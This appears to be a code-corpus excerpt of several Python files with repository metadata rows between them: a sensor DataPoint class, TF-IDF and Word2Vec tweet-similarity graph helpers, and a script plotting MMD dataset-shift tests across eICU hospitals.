def cluster_index_to_tokens(cluster_index: int, *, z: np.ndarray, tokens: list) -> list:
"""Return a list of tokens corresponding to a cluster index (as per z[:, 0:2]) values."""
if cluster_index < len(tokens):
return [tokens[cluster_index]]
else:
c1, c2 = z[cluster_index - len(tokens), 0:2].astype(int)
return cluster_index_to_tokens(
c1, z=z, tokens=tokens
) + cluster_index_to_tokens(c2, z=z, tokens=tokens)
if __name__ == "__main__":
main()
| 37.278261
| 148
| 0.648239
| 0
| 0
| 1,939
| 0.452298
| 0
| 0
| 0
| 0
| 1,944
| 0.453464
|
3c529f808ec5b62668f3e070b0cf33366833814f
| 3,434
|
py
|
Python
|
cerebralcortex/core/datatypes/datapoint.py
|
hippietilley/CerebralCortex-Kernel
|
c7dac033d9561f14bdb72430577db6ae4e3c7911
|
[
"BSD-2-Clause"
] | null | null | null |
cerebralcortex/core/datatypes/datapoint.py
|
hippietilley/CerebralCortex-Kernel
|
c7dac033d9561f14bdb72430577db6ae4e3c7911
|
[
"BSD-2-Clause"
] | null | null | null |
cerebralcortex/core/datatypes/datapoint.py
|
hippietilley/CerebralCortex-Kernel
|
c7dac033d9561f14bdb72430577db6ae4e3c7911
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2018, MD2K Center of Excellence
# - Nasir Ali <nasir.ali08@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from datetime import datetime
from typing import Any
class DataPoint:
def __init__(self,
start_time: datetime = None,
end_time: datetime = None,
offset: str = None,
sample: Any = None):
"""
DataPoint is the lowest data representations entity in CerebralCortex.
:param start_time:
:param end_time:
:param offset: in milliseconds
:param sample:
"""
self._start_time = start_time
self._end_time = end_time
self._offset = offset
self._sample = sample
@property
def sample(self):
return self._sample
@sample.setter
def sample(self, val):
self._sample = val
@property
def start_time(self):
return self._start_time
@start_time.setter
def start_time(self, val):
self._start_time = val
@property
def end_time(self):
return self._end_time
@end_time.setter
def end_time(self, val):
self._end_time = val
@property
def offset(self):
return self._offset
@offset.setter
def offset(self, val):
self._offset = val
def getKey(self):
return self._start_time
@classmethod
def from_tuple(cls, start_time: datetime, sample: Any, end_time: datetime = None, offset: str = None):
return cls(start_time=start_time, end_time=end_time, offset=offset, sample=sample)
def __str__(self):
return 'DataPoint(' + ', '.join(
map(str, [self._start_time, self._end_time, self._offset, self._sample])) + ')\n'
def __repr__(self):
return 'DataPoint(' + ', '.join(
map(str, [self._start_time, self._end_time, self._offset, self._sample])) + ')\n'
def __lt__(self, dp):
# if hasattr(dp, 'getKey'):
return self.getKey().__lt__(dp.getKey())
def __eq__(self, dp):
return self._start_time == dp.start_time
def __hash__(self):
return hash(('start_time', self.start_time))
| 33.019231
| 106
| 0.674432
| 1,995
| 0.580955
| 0
| 0
| 748
| 0.217822
| 0
| 0
| 1,647
| 0.479616
|
3c5554bd05cd5239ce11e4e4dd8fa2e50df67f34
| 7,444
|
py
|
Python
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | 1
|
2021-05-20T20:53:19.000Z
|
2021-05-20T20:53:19.000Z
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | 1
|
2021-04-06T08:34:05.000Z
|
2021-11-24T10:47:27.000Z
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | null | null | null |
import sys
import networkx as nx
#from simhash import Simhash, SimhashIndex
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
# if there is a problem with gensim and Word2Vec, check the python version
# to be 2.7
# print('Hello from {}'.format(sys.version))
# TF-IDF helper function
def reveal_similar_links(G, cids, contents, threshold=0.5):
"""
Function to calculate the TF-IDF vectors for all tweet/contents and then it
calculates the cosine similarity for all pairs. It returns the graph with
edges between the similar tweet-nodes, when the cosine similarity for a
pair of tweet-nodes is above a threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
cids (list): The list with the tweet ids from the tweet-nodes of the
graph.
contents (list): The list with the preprocessed content from the tweet-
nodes. Indexing is the same as in the 'cids' list.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
Returns:
The enriched graph instance (networkx.Graph()), after revealing the
hidden edges between similar tweet-nodes.
"""
try:
tfidf = TfidfVectorizer(norm='l2', max_features=1000)
tf_idf_matrix = tfidf.fit_transform(contents)
tf_idf_matrix.todense()
pairwise_similarity = tf_idf_matrix * tf_idf_matrix.T
cos_matrix = (pairwise_similarity).A
tsize = len(contents)
for i in range(0, tsize):
for j in range(i+1, tsize):
# similarity score is in [-1, 1]
sim_score = cos_matrix[i][j]
if sim_score > threshold:
# reveal hidden edge (between similar tweet-nodes)
G.add_edge(cids[i], cids[j], edgetype='similarTo')
except:
pass
return G
# Add edges between all pairs of similar content nodes based on TFIDF
def reveal_hidden_links_tfidf(G, content_dict, threshold):
"""
Function to reveal hidden similarity edges between tweet-nodes based only
on TF-IDF vectors and a cosine similarity threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
Returns:
The returning element of the function 'reveal_similar_links', a.k.a. an
enriched graph instance, after revealing the hidden edges between
similar tweet-nodes.
"""
cids = content_dict.keys()
contents = content_dict.values()
return reveal_similar_links(G, cids, contents, threshold)
# Creates w-shingles for SimHash
def get_shingles(sentence, n):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
SimHash, an LSH approximation on TF-IDF vectors and a cosine similarity
threshold.
Args:
sentence (str): The sentence (preprocessed text from a tweet-node),
from which the shingles will be created.
n (int): The size of the shingle. In this case, the size is always set
to be three, and it means that all possible tuples with three
consecutive words will be created.
Returns:
A list with all triples made by consecutive words in a sentence.
"""
s = sentence.lower()
return [s[i:i + n] for i in range(max(len(s) - n + 1, 1))]
# Add edges between all pairs of similar content nodes based on SimHash
def reveal_hidden_links_simhash(G, content_dict, threshold):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
SimHash, an LSH approximation on TF-IDF vectors and a cosine similarity
threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
Returns:
The returning element of the function 'reveal_similar_links', a.k.a. an
enriched graph instance, after revealing the hidden edges between
similar tweet-nodes.
"""
objs = []
for cid, content in content_dict.items():
objs.append((cid, Simhash(get_shingles(content, 3), f=1)))
index = SimhashIndex(objs, f=1, k=2)
for key in index.bucket:
bucket_item = index.bucket[key]
contents = []
cids = []
for item in bucket_item:
newid = str(item.split(',')[-1])
contents.append(content_dict[newid])
cids.append(newid)
G = reveal_similar_links(G, cids, contents, threshold)
return G
# Add edges between all pairs of similar content nodes based on word2vec
def reveal_hidden_links_w2v(G, content_dict, threshold, model, k=3):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
Word2Vec enriched TF-IDF vectors and a cosine similarity threshold. More
specifically, for each word in a tweet, we add the 'k' most similar words
according to the pre-trained Word2Vec model.
Note: If you need to speed up the code during experimentation, it is better
to calculate the Word2Vec enriched text and cache it.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
model (gensim.models.KeyedVectors()): The Google's pre-trained
Word2Vec model.
k (int): The number of similar words to add.
Returns:
The returning element of the function 'reveal_similar_links', a.k.a. an
enriched graph instance, after revealing the hidden edges between
similar tweet-nodes.
"""
contents = content_dict.values()
cids = content_dict.keys()
enriched_contents = []
for c in contents:
words = c.split(' ')
enriched_list = []
for w in words:
try:
w2v_sim_list = model.most_similar(w, topn=k)
sim_words = [str(t[0]) for t in w2v_sim_list]
enriched_list.append(' '.join(sim_words) + ' ' + w)
except:
enriched_list.append(w)
pass
if len(enriched_list) > 0:
enriched_contents.append(' '.join(enriched_list))
return reveal_similar_links(G, cids, enriched_contents, threshold)
| 35.113208
| 79
| 0.657308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,997
| 0.671279
|
3c556dec90e23792b76acc982f2031b9cf0acc91
| 27,754
|
py
|
Python
|
generate_hosp_plot.py
|
ChunaraLab/medshifts
|
cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b
|
[
"MIT"
] | 1
|
2021-11-25T12:26:16.000Z
|
2021-11-25T12:26:16.000Z
|
generate_hosp_plot.py
|
ChunaraLab/medshifts
|
cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b
|
[
"MIT"
] | null | null | null |
generate_hosp_plot.py
|
ChunaraLab/medshifts
|
cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b
|
[
"MIT"
] | null | null | null |
'''
Modifed from code by Stephan Rabanser https://github.com/steverab/failing-loudly
Plot test results across hospitals
Usage:
# region
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 4 --random_runs 100 --min_samples 5000 --sens_attr race --group --group_type regions --limit_samples
# beds
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 4 --random_runs 100 --min_samples 10000 --sens_attr race --group --group_type beds --limit_samples
# region, beds
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 5 --random_runs 100 --min_samples 5000 --sens_attr race --group --group_type regions_beds --limit_samples
# region, beds, teaching
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 6 --random_runs 100 --min_samples 4000 --sens_attr race --group --group_type regions_beds_teaching --limit_samples
# hospitals
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 10 --random_runs 100 --min_samples 1631 --sens_attr race --limit_samples
# python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 10 --random_runs 100 --min_samples 2000 --sens_attr race --limit_samples
'''
import argparse
from multiprocessing import Value
import pickle
import numpy as np
import seaborn as sns
import pandas as pd
from scipy import stats
from matplotlib.colors import ListedColormap
from itertools import combinations
seed = 1
np.random.seed(seed)
from shift_detector import *
from shift_locator import *
from shift_applicator import *
from data_utils import *
import os
import sys
from exp_utils import *
from plot_utils import *
# -------------------------------------------------
# CONFIG
# -------------------------------------------------
# make_keras_picklable()
np.set_printoptions(threshold=sys.maxsize)
parser = argparse.ArgumentParser()
parser.add_argument("--datset", type=str, default='eicu')
parser.add_argument("--path", type=str, default='orig')
parser.add_argument("--test_type", type=str, default='multiv')
parser.add_argument("--sens_attr", type=str, default='gender') # gender, race
parser.add_argument("--num_hosp", type=int, default=5)
parser.add_argument("--random_runs", type=int, default=10)
parser.add_argument("--min_samples", type=int, default=1500)
parser.add_argument("--group", action='store_true')
parser.add_argument("--group_type", type=str, default='hosp')
parser.add_argument("--limit_samples", action='store_true') # limit two-sample testing to 5000 samples
args = parser.parse_args()
datset = args.datset # sys.argv[1]
test_type = args.test_type # sys.argv[3]
use_group = args.group
group_type = args.group_type
sens_attr = args.sens_attr
limit_samples = args.limit_samples
HospitalGroups_eicu, HospitalGroupsColnames_eicu = get_groups_colnames(group_type)
# path = './hosp_results_gossis_multiv/'
path = './hosp_results_{}_{}_shuffle/'.format(datset, test_type)
path += '{}_group{}_{}_nh{}_run{}_mins{}_s{}_l{}_{}/'.format(datset, use_group, group_type, args.num_hosp, args.random_runs, args.min_samples, sens_attr, limit_samples, args.path)
if not os.path.exists(path):
os.makedirs(path)
# Define train-test pairs of hospitals
NUM_HOSPITALS_TOP = args.num_hosp # 5 # hospitals with records >= 1000
hosp_pairs = []
# TODO move to data_utils
if datset =='eicu':
if use_group:
HospitalIDs = HospitalGroups_eicu
HospitalIDsColnames = HospitalGroupsColnames_eicu
else: # single hospitals
HospitalIDs = HospitalIDs_eicu
HospitalIDsColnames = HospitalIDs_eicu
FeatureGroups = FeatureGroups_eicu
# Define feature groups
# feature_groups = [['labs','vitals','demo','others','saps2diff']]
# feature_groups = [['labs','labs_blood_gas']]
# feature_groups = [['vitals']]
# feature_groups = [['demo']]
# feature_groups = [['saps2labs','saps2vitals']]
# feature_groups = [['saps2'], ['labs'], ['vitals'], ['demo']]
feature_groups = [['saps2']]
# feature_groups = [['saps2'], ['labs','vitals','demo','others']]
elif datset =='gossis':
HospitalIDs = HospitalIDs_gossis
HospitalIDsColnames = HospitalIDs_gossis
FeatureGroups = FeatureGroups_gossis
# Define feature groups
feature_groups = [['APACHE_covariate']]
# feature_groups = [['demographic'], ['vitals'], ['labs','labs_blood_gas'],['APACHE_covariate']]
# feature_groups = [['APACHE_covariate'], ['labs','labs_blood_gas'], ['vitals'], ['APACHE_comorbidity'],
# ['demographic','vitals','labs','labs_blood_gas','APACHE_comorbidity']]
HospitalIDs = HospitalIDs[:NUM_HOSPITALS_TOP]
HospitalIDsColnames = HospitalIDsColnames[:NUM_HOSPITALS_TOP]
# HospitalIDs = [i for i in HospitalIDs if i not in [413,394,199,345]]
for hi in range(len(HospitalIDs)):
for hj in range(len(HospitalIDs)):
hosp_pairs.append((hi,hj,[HospitalIDs[hi]],[HospitalIDs[hj]]))
# hosp_pairs = [([394],[416])]
print('Use groups', use_group, 'Sensitive attribute', sens_attr, 'Hospital pairs', hosp_pairs)
# Define DR methods
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value, DimensionalityReduction.UAE.value, DimensionalityReduction.TAE.value, DimensionalityReduction.BBSDs.value, DimensionalityReduction.BBSDh.value]
dr_techniques = [DimensionalityReduction.NoRed.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value]
if test_type == 'multiv':
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value, DimensionalityReduction.UAE.value, DimensionalityReduction.TAE.value, DimensionalityReduction.BBSDs.value]
dr_techniques = [DimensionalityReduction.NoRed.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value]
if test_type == 'univ':
dr_techniques_plot = dr_techniques.copy()
# dr_techniques_plot.append(DimensionalityReduction.Classif.value)
else:
dr_techniques_plot = dr_techniques.copy()
# Define test types and general test sample sizes
test_types = [td.value for td in TestDimensionality]
if test_type == 'multiv':
od_tests = []
md_tests = [MultidimensionalTest.MMD.value]
# samples = [10, 20, 50, 100, 200, 500, 1000]
# samples = [100, 1000]
samples = [args.min_samples]
# samples = [2500]
# samples = [1000, 1500]
# samples = [10, 20, 50, 100, 200]
else:
# od_tests = [od.value for od in OnedimensionalTest]
od_tests = [OnedimensionalTest.KS.value]
md_tests = []
# samples = [10, 20, 50, 100, 200, 500, 1000, 9000]
# samples = [100, 1000]
samples = [args.min_samples]
# samples = [2500]
# samples = [1000, 1500]
# samples = [10, 20, 50, 100, 200, 500]
difference_samples = 10
# Number of random runs to average results over
random_runs = args.random_runs # 5
# Signifiance level
sign_level = 0.05
# sign_level = 0.01
# Define shift types
# if args.path == 'orig': # sys.argv[2]
# shifts = ['orig']
# brightness = [0.75]
# # shifts = ['rand', 'orig']
# # brightness = [1.25, 0.75]
# else:
# shifts = []
shifts = ['orig']
# -------------------------------------------------
# PIPELINE START
# -------------------------------------------------
sns.set_style("ticks")
cmap = sns.color_palette("rocket_r", as_cmap=True)
# cmap = sns.color_palette("vlag", as_cmap=True)
# cmap = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
# Discrete colormap using code by lanery https://stackoverflow.com/questions/38836154/discrete-legend-in-seaborn-heatmap-plot
cmap_binary = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0)
NUM_METRICS = 36
samples_shifts_rands_dr_tech_feats_hosps = np.ones((len(samples), len(shifts), random_runs, len(dr_techniques_plot), len(feature_groups), len(hosp_pairs))) * (-1)
samples_shifts_rands_dr_tech_feats_hosps_t_val = np.ones((len(samples), len(shifts), random_runs, len(dr_techniques_plot), len(feature_groups), len(hosp_pairs))) * (-1)
samples_shifts_rands_feats_hosps_te_acc = np.ones((len(samples), len(shifts), random_runs, len(feature_groups), len(hosp_pairs), NUM_METRICS)) * (-1) # 0-auc, 1-smr # TODO add auc, smr, p-val, mmd in same array. add hosp_pair
samples_shifts_rands_feats_hosp_pairs_te_acc = np.ones((len(samples), len(shifts), random_runs, len(feature_groups), len(HospitalIDs), len(HospitalIDs), NUM_METRICS)) * (-1) # 0-auc, 1-smr # TODO add auc, smr, p-val, mmd in same array. add hosp_pair
for feature_group_idx, feature_group in enumerate(feature_groups):
target = FeatureGroups['outcome']
feature_set = []
for group in feature_group:
feature_set += FeatureGroups[group]
samples_shifts_rands_feat_hosps_p_vals = np.ones((len(samples), len(shifts), len(dr_techniques_plot), len(od_tests), len(feature_set), random_runs, len(hosp_pairs))) * (-1)
samples_shifts_rands_feat_hosps_t_vals = np.ones((len(samples), len(shifts), len(dr_techniques_plot), len(od_tests), len(feature_set), random_runs, len(hosp_pairs))) * (-1)
for hosp_pair_idx, (hosp_train_idx, hosp_test_idx, hosp_train, hosp_test) in enumerate(hosp_pairs):
print("\n==========\nFeature Set, Hosp Train, Hosp Test", feature_group, hosp_train, hosp_test)
print("==========\n")
feats_path = path + "_".join(feature_group) + '/'
hosp_folder_name = 'tr_' + '_'.join(map(str, hosp_train)) + '_ts_' + '_'.join(map(str, hosp_test))
hosp_path = feats_path + hosp_folder_name + '/'
samples_shifts_rands_dr_tech = np.load("%s/samples_shifts_rands_dr_tech.npy" % (hosp_path))
samples_shifts_rands_dr_tech_t_val = np.load("%s/samples_shifts_rands_dr_tech_t_val.npy" % (hosp_path))
with open("%s/samples_shifts_rands_metrics.pkl" % (hosp_path), 'rb') as fr:
metric_results = pickle.load(fr)
# print("sadf", "%s/samples_shifts_rands_metrics.pkl" % (hosp_path))
# print(metric_results.results_train[0,0,0])
samples_shifts_rands_te_acc, metric_names = get_metrics_array(metric_results)
samples_shifts_rands_dr_tech_feats_hosps[:,:,:,:,feature_group_idx,hosp_pair_idx] = samples_shifts_rands_dr_tech
samples_shifts_rands_dr_tech_feats_hosps_t_val[:,:,:,:,feature_group_idx,hosp_pair_idx] = samples_shifts_rands_dr_tech_t_val
samples_shifts_rands_feats_hosps_te_acc[:,:,:,feature_group_idx,hosp_pair_idx,:] = samples_shifts_rands_te_acc
samples_shifts_rands_feats_hosp_pairs_te_acc[:,:,:,feature_group_idx,hosp_train_idx,hosp_test_idx,:] = samples_shifts_rands_te_acc
if test_type == 'univ':
samples_shifts_rands_feat_p_vals = np.load("%s/samples_shifts_rands_feat_p_vals.npy" % (hosp_path))
samples_shifts_rands_feat_t_vals = np.load("%s/samples_shifts_rands_feat_t_vals.npy" % (hosp_path))
samples_shifts_rands_feat_hosps_p_vals[:,:,:,:,:,:,hosp_pair_idx] = samples_shifts_rands_feat_p_vals
samples_shifts_rands_feat_hosps_t_vals[:,:,:,:,:,:,hosp_pair_idx] = samples_shifts_rands_feat_t_vals
np.save("%s/samples_shifts_rands_feat_hosps_p_vals.npy" % (feats_path), samples_shifts_rands_feat_hosps_p_vals)
np.save("%s/samples_shifts_rands_feat_hosps_t_vals.npy" % (feats_path), samples_shifts_rands_feat_hosps_t_vals)
np.save("%s/samples_shifts_rands_dr_tech_feats_hosps.npy" % (path), samples_shifts_rands_dr_tech_feats_hosps)
np.save("%s/samples_shifts_rands_dr_tech_feats_hosps_t_val.npy" % (path), samples_shifts_rands_dr_tech_feats_hosps_t_val)
np.save("%s/samples_shifts_rands_feats_hosps_te_acc.npy" % (path), samples_shifts_rands_feats_hosps_te_acc)
np.save("%s/samples_shifts_rands_feats_hosp_pairs_te_acc.npy" % (path), samples_shifts_rands_feats_hosp_pairs_te_acc)
# Feat, dr, shift, sample - mean
for feature_group_idx, feature_group in enumerate(feature_groups):
print("==========\nPlotting", feature_group)
print("==========")
target = FeatureGroups['outcome']
feature_set = []
for group in feature_group:
feature_set += FeatureGroups[group]
feats_path = path + "_".join(feature_group) + '/'
if test_type == 'univ':
samples_shifts_rands_feat_hosps_p_vals = np.load("%s/samples_shifts_rands_feat_hosps_p_vals.npy" % (feats_path))
samples_shifts_rands_feat_hosps_t_vals = np.load("%s/samples_shifts_rands_feat_hosps_t_vals.npy" % (feats_path))
for dr_idx, dr in enumerate(dr_techniques_plot):
for shift_idx, shift in enumerate(shifts):
for si, sample in enumerate(samples):
hosp_pair_pval = np.ones((len(HospitalIDs), len(HospitalIDs))) * (-1)
hosp_pair_tval = np.ones((len(HospitalIDs), len(HospitalIDs))) * (-1)
if test_type == 'univ':
# hosp_pair_feat_pval = np.ones((len(hosp_pairs), len(feature_set), random_runs))
hosp_pair_feat_pval = np.ones((len(hosp_pairs), len(feature_set)))
hosp_pair_feat_tval = np.ones((len(hosp_pairs), len(feature_set)))
for hosp_pair_idx, (hosp_train_idx, hosp_test_idx, hosp_train, hosp_test) in enumerate(hosp_pairs):
feats_dr_tech_shifts_samples_results = samples_shifts_rands_dr_tech_feats_hosps[si,shift_idx,:,dr_idx,feature_group_idx,hosp_pair_idx]
feats_dr_tech_shifts_samples_results_t_val = samples_shifts_rands_dr_tech_feats_hosps_t_val[si,shift_idx,:,dr_idx,feature_group_idx,hosp_pair_idx]
mean_p_vals = np.mean(feats_dr_tech_shifts_samples_results)
std_p_vals = np.std(feats_dr_tech_shifts_samples_results)
mean_t_vals = np.mean(feats_dr_tech_shifts_samples_results_t_val)
hosp_pair_pval[hosp_train_idx, hosp_test_idx] = mean_p_vals < sign_level
hosp_pair_tval[hosp_train_idx, hosp_test_idx] = mean_t_vals
# adjust_sign_level = sign_level / len(hosp_pairs)
adjust_sign_level = sign_level
if test_type == 'univ':
dr_tech_shifts_samples_results_feat_p_val = samples_shifts_rands_feat_hosps_p_vals[si,shift_idx,dr_idx,0,:,:,hosp_pair_idx] # TODO iterate for od_tests
dr_tech_shifts_samples_results_feat_t_val = samples_shifts_rands_feat_hosps_t_vals[si,shift_idx,dr_idx,0,:,:,hosp_pair_idx] # TODO iterate for od_tests
mean_feat_p_vals = np.mean(dr_tech_shifts_samples_results_feat_p_val, axis=1)
mean_feat_t_vals = np.mean(dr_tech_shifts_samples_results_feat_t_val, axis=1)
# hosp_pair_feat_pval[hosp_pair_idx, :, :] = dr_tech_shifts_samples_results_feat_p_val
hosp_pair_feat_pval[hosp_pair_idx, :] = mean_feat_p_vals < adjust_sign_level
hosp_pair_feat_tval[hosp_pair_idx, :] = mean_feat_t_vals
# p-value MMD test
hosp_avg_pval = hosp_pair_pval.mean(axis=1)
hosp_pair_pval_triu = np.triu(np.ones_like(hosp_pair_pval, dtype=np.bool))
np.fill_diagonal(hosp_pair_pval_triu, False)
hosp_pair_pval = pd.DataFrame(hosp_pair_pval, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_pval.to_csv("%s/%s_%s_%s_%s_p_val_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
# cmap_binary = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0)
# fig = sns.heatmap(hosp_pair_pval, linewidths=0.5, cmap=ListedColormap(cmap_binary))
fig = sns.heatmap(hosp_pair_pval, mask=hosp_pair_pval_triu, linewidths=0.5, cmap=ListedColormap(cmap_binary))
colorbar = fig.collections[0].colorbar
colorbar.set_ticks([0.25, 0.75])
colorbar.set_ticklabels(['No Data Shift', 'Data Shift'])
label_text = 'Hospital ID'
if use_group and group_type=='regions':
label_text = 'Region'
elif use_group and group_type=='beds':
label_text = 'Numbedscategory'
plt.xlabel(label_text) # Target
plt.ylabel(label_text) # Source
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_p_val_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
# cmap = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
if test_type == 'univ':
# hosp_pair_feat_pval = hosp_pair_feat_pval.min(axis=0) # Bonferroni correction by taking min across hospital pairs
# hosp_pair_feat_avg_pval = hosp_pair_feat_pval.mean(axis=1) < adjust_sign_level # mean across random runs
hosp_pair_feat_avg_pval = hosp_pair_feat_pval.mean(axis=0)
feature_set_escaped = [i.replace('_', '\_') for i in feature_set]
hosp_pair_feat_avg_pval = pd.DataFrame(hosp_pair_feat_avg_pval, index=feature_set_escaped)
hosp_pair_feat_avg_pval.columns=["Features"]
hosp_pair_feat_avg_pval.to_csv("%s/%s_%s_%s_%s_feat_avg_pval_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
plt.figure(figsize=(8, 6))
fig = sns.heatmap(hosp_pair_feat_avg_pval, linewidths=0.5, cmap=cmap, square=True)
plt.savefig("%s/%s_%s_%s_%s_feat_avg_pval_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
hosp_pair_feat_avg_tval = hosp_pair_feat_tval.mean(axis=0)
hosp_pair_feat_avg_tval = pd.DataFrame(hosp_pair_feat_avg_tval, index=feature_set_escaped)
hosp_pair_feat_avg_tval.columns=["Features"]
hosp_pair_feat_avg_tval.to_csv("%s/%s_%s_%s_%s_feat_avg_tval_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
plt.figure(figsize=(8, 6))
fig = sns.heatmap(hosp_pair_feat_avg_tval, linewidths=0.5, cmap=cmap, square=True)
plt.savefig("%s/%s_%s_%s_%s_feat_avg_tval_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
# Minimum of the pairwise average tval in subsets of 5 hospitals
MAX_NUM_SUBSET = 5
HospitalIDs_ = np.array(HospitalIDsColnames)
for num_subset in range(1, MAX_NUM_SUBSET+1):
avg_tval_subset = []
for subs in combinations(range(len(HospitalIDs_)), num_subset):
avg_tval_subset.append((subs, hosp_pair_tval[np.ix_(subs,subs)].mean()))
avg_tval_subset_sorted = sorted(avg_tval_subset, key=lambda x: x[1])
avg_tval_subset_sorted = [(HospitalIDs_[np.array(subs)],mmd) for subs,mmd in avg_tval_subset_sorted]
avg_tval_subset_sorted = pd.DataFrame(avg_tval_subset_sorted, columns=['HospitalIDs','average_MMD'])
avg_tval_subset_sorted.to_csv("%s/%s_%s_%s_%s_%s_t_val_min_subset.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, num_subset), index=False)
# MMD statistic value
hosp_avg_tval = hosp_pair_tval.mean(axis=1)
hosp_pair_tval_triu = np.triu(np.ones_like(hosp_pair_tval, dtype=np.bool))
np.fill_diagonal(hosp_pair_tval_triu, False)
hosp_pair_tval = pd.DataFrame(hosp_pair_tval, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_tval.to_csv("%s/%s_%s_%s_%s_t_val_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
# cmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
# fig = sns.heatmap(hosp_pair_tval, linewidths=0.5, cmap=cmap)
fig = sns.heatmap(hosp_pair_tval, mask=hosp_pair_tval_triu, linewidths=0.5, cmap=cmap)
label_text = 'Hospital ID'
if use_group and group_type=='regions':
label_text = 'Region'
elif use_group and group_type=='beds':
label_text = 'Numbedscategory'
plt.xlabel(label_text) # Target
plt.ylabel(label_text) # Source
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_t_val_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
